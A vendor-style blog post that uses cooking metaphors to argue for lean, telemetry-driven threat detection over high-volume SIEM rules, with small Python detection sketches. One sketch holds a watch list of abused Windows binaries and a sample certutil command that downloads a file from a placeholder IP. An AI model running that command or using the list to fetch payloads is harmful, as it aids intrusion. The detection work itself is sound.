
                What is the Recipe for Threat Detection?

Misconceptions about tools and tactics mess with the ingredient mix needed to mitigate risk.

By: Matt DeMatteo

                I grew up in a family restaurant and learned to cook around age 8. My food wasn't good, though. It was too busy. I was trying too hard. A simple lesson all good cooks know is that less is more. Too many ingredients and spices make dishes bland because nothing stands out.

                After working in cybersecurity for the past decade, I can confidently say the same logic applies to threat detection. You can't throw everything into a pot and hope to get a good outcome. The right data, used in the right way, can provide much better outcomes than a strategy that is based on data volume.

                SIEMs: Too Many Cooks Spoil the Broth

Threat detection is undeniably a data problem, so it is logical that there should be a data-focused solution. Enter the SIEM. SIEMs started to come onto the market around 2005. When I worked as a security analyst, simply being presented with the relevant firewall, IDS, AV, and OS logs was enough to identify a true-positive security issue. But much has changed since 2005.

Today, security controls such as NGFW and NGAV do a great job of preventing known threats, which reduces the overall event volume an organization has to deal with. However, most controls do a poor job of providing the granular information, what we call telemetry, that can be used to detect threats that have not been prevented. Typical SIEM deployments aim to detect threats by letting users configure rules so that a manageable number of qualified alerts are produced. The problem is that, like a broken clock that is still right twice a day, those rules only occasionally land on a real threat. Most organizations spend a lot of effort getting their SIEMs into a state where event volume is manageable, only to discover the alerts are mostly false positives. They then seek out additional security controls and integrations, only to discover that the SIEM needs more – more tuning, more storage, more processing power. The cycle of playing with the volume knobs, spending more on consulting, and dealing with false positives continues. None of it dissuades the adversary in any way.

                The Best Dishes are Made with The Best Ingredients

                Starting with the premise that threat detection is the practice of automatically finding suspicious or malicious activity that has NOT been prevented by security controls, let us look at what ingredients should be in our threat detection recipe.

• Endpoint Telemetry – This is the most basic ingredient of threat detection. Adversaries who are not stopped by security controls very often establish a foothold in an organization through a workstation or server. From there, "Living off the Land" techniques are employed. You can check out the LOLBAS GitHub project (Living off the Land Binaries and Scripts) to understand more about these techniques. Endpoint telemetry from well-instrumented EDR, NGAV, and similar endpoint tools provides the raw data needed to detect Living off the Land activity (a minimal detection sketch follows this list). This activity can typically be caught early in the intrusion process (during discovery, defensive evasion, lateral movement, and data collection). You can read more about Living off the Land and other findings from hundreds of our incident response engagements by downloading the free Incident Response Insights Report.
• Network Telemetry – NGFWs and other network security controls still have a critical part to play in threat detection, but not in the way that most SIEMs process the data. Most SIEMs try to prioritize alerts from network controls by using rules and correlation to upgrade or downgrade the alert from the vendor's default. There are simply too many alerts generated by most network controls for this strategy to work. Network telemetry should instead be used to capture as many netflows and DNS requests going in and out of the environment as possible. This is critical because not every IP-enabled device can run EDR/NGAV tools, but every one of them can be compromised. Statistical analysis of netflows alone can yield true-positive alerts, but the ratio of true to false positives tends to be very low. (A great, short outline of the pros and cons of this approach can be found in a blog post by Anton Chuvakin.) Correlating alerts and netflows with higher-fidelity information helps in investigations.
• Cloud Telemetry – As more workloads, applications, and IT assets move to cloud models, telemetry from various cloud applications and APIs is critical to achieving full visibility across an organization. Universally, data and events about authentication and user activity in the cloud are essential. Some organizations may find additional value in gathering application or transaction data, but almost all notable breaches involving cloud assets or services hinged on credential theft, abuse, or access permissions. In other words, not "hacking" in the academic sense, just good ol' fashioned theft and fraud.
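As a concrete illustration of the endpoint telemetry point above, here is a minimal sketch, in Python, of flagging possible Living off the Land activity in process telemetry. The field names (process_name, command_line, parent_process) and the short watch list are illustrative assumptions, not a product schema or a complete LOLBAS inventory.

# Minimal sketch: flag possible Living off the Land activity in endpoint
# process telemetry. The field names and the watch list below are illustrative
# assumptions, not any vendor's schema or a complete LOLBAS inventory.
SUSPECT_BINARIES = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wmic.exe"}
SUSPECT_FLAGS = ("-urlcache", "http://", "https://", "javascript:", "scrobj.dll")

def flag_lolbin_activity(events):
    """Yield process events where a commonly abused binary is launched
    with arguments that suggest download, script, or proxy execution."""
    for event in events:
        name = event.get("process_name", "").lower()
        cmdline = event.get("command_line", "").lower()
        if name in SUSPECT_BINARIES and any(flag in cmdline for flag in SUSPECT_FLAGS):
            yield {
                "host": event.get("host"),
                "parent": event.get("parent_process"),
                "reason": name + " launched with suspicious arguments",
                "command_line": event.get("command_line"),
            }

# Example: a certutil download that prevention did not block would be surfaced here.
sample = [{"host": "ws-042", "process_name": "certutil.exe", "parent_process": "winword.exe",
           "command_line": "certutil.exe -urlcache -split -f http://203.0.113.7/a.dat a.dat"}]
print(list(flag_lolbin_activity(sample)))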

                Chop, Dice, Simmer, and Stir

Once you have collected the ingredients for your threat detection recipe, it is time to prep them. The most common way to process all this data is with a SIEM. This technology varies in every dimension – Gartner's Magic Quadrant for SIEM (2018) evaluates more than 15 SIEMs, and that is only scratching the surface. In general, however, SIEMs take a conveyor-belt approach to processing data. As logs are ingested, they are evaluated against rules in order to assign a criticality or severity to the event. Certain SIEMs can do analysis such as historical look-backs and evaluate patterns of activity over time. But the burden on the system of keeping up with real-time log processing, running queries and reports, and providing a stable GUI and UX makes the investment needed too high for most organizations. In the end, the SIEM gets maxed out by its basic functions: log retention and querying. While log retention and querying are important, they are no substitute for threat detection.
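As a rough illustration of that conveyor-belt model, here is a minimal sketch, in Python, of per-event rule evaluation at ingest time. The rules, field names, and severities are illustrative assumptions, not any SIEM's rule language; the point is that each event is judged on its own as it passes by.

# Minimal sketch of the conveyor-belt model: each event is evaluated against
# static rules at ingest time and assigned a severity in isolation.
# The rules and field names are illustrative assumptions.
RULES = [
    (lambda e: e.get("event_type") == "auth_failure" and e.get("count", 1) > 20, "high"),
    (lambda e: e.get("event_type") == "av_detection", "medium"),
    (lambda e: e.get("event_type") == "firewall_deny", "low"),
]

def assign_severity(event):
    """Return the first matching rule's severity, else 'informational'."""
    for predicate, severity in RULES:
        if predicate(event):
            return severity
    return "informational"

# Example: a burst of failed logons is tagged "high"; anything unmatched is "informational".
print(assign_severity({"event_type": "auth_failure", "count": 35}))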

The proper way to prepare all these ingredients is with a security analytics platform. These platforms typically handle data ingestion and data analysis differently than SIEMs do. A wide variety of security data can be easily ingested, including the three types highlighted above: endpoint telemetry, network telemetry, and cloud telemetry. Security analytics platforms can process and enrich logs as they are ingested, adding tags or annotations to the processed event. This is a more advanced version of the categorization that SIEMs do (usually by data source type). Lastly, security analytics platforms tend to decouple the collection and processing of logs from the analysis and flagging of suspicious or malicious activity. They do this by maintaining a list of distinct analytics – each purpose-built to find or highlight certain activity – and running those analytics against the processed data. Because the data has been processed first, the analytics can operate much faster.
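Here is a minimal sketch, in Python, of that decoupling: events are enriched and tagged once at ingest, and a separate list of narrow, purpose-built analytics then runs over the enriched records. The tags, field names, and the two example analytics are illustrative assumptions, not a vendor's schema.

# Minimal sketch: enrichment at ingest, decoupled from purpose-built analytics.
# Tags, fields, and the example analytics below are illustrative assumptions.
def enrich(event):
    """Annotate an event at ingest time so later analytics can stay simple."""
    tags = set()
    if event.get("dst_port") in (3389, 22):
        tags.add("remote_admin_protocol")
    if event.get("dst_ip", "").startswith("10."):
        tags.add("internal_destination")
    if event.get("user", "").endswith("$"):
        tags.add("machine_account")
    return {**event, "tags": tags}

def analytic_internal_remote_admin(enriched):
    """One narrow analytic: remote admin protocols used between internal hosts."""
    return [e for e in enriched
            if "remote_admin_protocol" in e["tags"] and "internal_destination" in e["tags"]]

def analytic_machine_account_logon(enriched):
    """Another independent analytic: interactive use of a machine account."""
    return [e for e in enriched
            if "machine_account" in e["tags"] and e.get("logon_type") == "interactive"]

ANALYTICS = [analytic_internal_remote_admin, analytic_machine_account_logon]

def run_pipeline(raw_events):
    enriched = [enrich(e) for e in raw_events]      # processing step
    return [hit for analytic in ANALYTICS           # analysis step, decoupled
            for hit in analytic(enriched)]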

The benefits are twofold. First, the system generates alerts of higher fidelity than can be achieved by applying Boolean rules or regular expressions to essentially unenriched data. Second, many of the initial steps of an investigation have already been performed and are easy to review, because those steps were part of the automated analysis.

                Simplify and Prosper

One of the biggest preventable expenses in running a restaurant is spoilage – raw ingredients going rotten. It is caused by a poor understanding of how much food you need in the cooler, how much you are using, and what customers are ordering. When security programs aim to "collect all the things," they put a huge burden on every part of the program: too much investment goes into the systems for collecting, storing, and processing all the data; too many consulting hours are spent keeping the architecture functioning; too many alerts cause analysts to burn out or to enact triage processes that may result in critical things being missed. The core of your threat detection strategy should be lean and mean. Once that core is established and showing results, decisions about what additional technologies or policies are needed can be made with greater confidence.

As an adversarial pursuit, security is all about balance and every asset pulling its weight. Log retention, compliance reporting, and raw log query capabilities are all important, but when it comes to risk, threat detection is paramount.

                Getting Past Use-Case FOMO

The main challenge for organizations trying to align their threat detection capabilities with their investments in different platforms is a fear of missing out on theoretical use-cases. Security analysis and threat detection evolved from simply processing security alerts from OSes, applications, IDS, and firewalls to Boolean logic rules: if X and Y happen, without Z, within time frame T, create an alert. This drove an industry-wide cry for extensive use-case development. The trend was encouraged by vendors selling data storage, processing power, and pay-by-volume licensing, and it was inadvertently supported by the proliferation of security conferences and security researchers. Every talk touted another thing you can't believe can be hacked, or an unstoppable way to bypass your expensive security devices. The conclusion many practitioners drew was that their use-case library needed to grow from tens, to hundreds, to thousands.
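To make that pattern concrete, here is a minimal sketch, in Python, of the "X and Y without Z within time frame T" style of correlation rule. The event labels, the (timestamp, label) tuple format, and the ten-minute window are illustrative assumptions, not any SIEM's rule syntax.

# Minimal sketch of the classic use-case pattern: alert when events X and Y
# both occur inside a time window T with no suppressing event Z between them.
from datetime import datetime, timedelta

def correlate(events, x, y, z, window=timedelta(minutes=10)):
    """events: (timestamp, label) tuples sorted by timestamp.
    Return True if an X and a later Y fall within `window` and no Z occurs first."""
    for t_x, label_x in events:
        if label_x != x:
            continue
        for t_other, label_other in events:
            if t_x <= t_other <= t_x + window:
                if label_other == z:
                    break            # suppressing event: this window does not alert
                if label_other == y:
                    return True      # X and Y within T, no Z seen first
    return False

# Example: a logon (X) followed by a sensitive export (Y) with no change ticket (Z).
t0 = datetime(2019, 1, 1, 9, 0)
print(correlate([(t0, "X"), (t0 + timedelta(minutes=3), "Y")], "X", "Y", "Z"))  # True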

The truth is that 1+1 equals 2, not 3. A huge majority of use cases either generate too many false positives or are too narrow. A narrow use case can catch a true positive, but a small change in adversary tactics will slip through it unnoticed.

Security analytics platforms replace use-cases with specific algorithms, each analyzing one small piece of the overall picture. Examples of common analytics are UEBA, anomalous IP or domain connections, and suspicious system behavior. When those ingredients are mixed together, a small number of high-quality alerts come out of the oven.
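As an illustration of that mixing, here is a minimal sketch, in Python, of how several weak, per-entity analytic signals might be aggregated so that only corroborated activity becomes an alert. The signal names, weights, and threshold are illustrative assumptions, not a description of any specific product.

# Minimal sketch: each analytic emits a weak, per-entity signal, and only
# entities that accumulate enough corroborating signals become an alert.
# Signal names, weights, and the threshold are illustrative assumptions.
from collections import defaultdict

SIGNAL_WEIGHTS = {
    "ueba_unusual_logon_hours": 2,
    "anomalous_domain_connection": 3,
    "suspicious_process_chain": 4,
}
ALERT_THRESHOLD = 6

def aggregate(signals):
    """signals: iterable of (entity, signal_name). Return entities whose
    combined weight crosses the threshold, with their supporting evidence."""
    scores, evidence = defaultdict(int), defaultdict(list)
    for entity, name in signals:
        scores[entity] += SIGNAL_WEIGHTS.get(name, 1)
        evidence[entity].append(name)
    return {entity: evidence[entity]
            for entity, score in scores.items() if score >= ALERT_THRESHOLD}

# Example: three weak signals on the same account add up to one high-quality alert.
signals = [("acct-jdoe", "ueba_unusual_logon_hours"),
           ("acct-jdoe", "anomalous_domain_connection"),
           ("acct-jdoe", "suspicious_process_chain")]
print(aggregate(signals))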

                Focus on What You Can Do Well

                If you own a restaurant and it's losing money, your best bet is to do less. Simplify your menu, pare down your list of ingredients, emphasize quality, and focus on being unique. The security industry offers broad guidance to all comers – collect more, store more, analyze more…more, more, more. But my message is: Don't do more, do right. Through the combination of your industry, budget, risk profile, user population, intellectual property, valuable assets, technology stack, and security program, your organization is unique. A security program must evolve, and that evolution can't happen if there is a focus on collecting 100% of data. The burden of getting to 100% is too great and doesn't even provide the value people expect. Set your sights on achieving what you need to be successful and have those goals vetted and tested by outside experts.

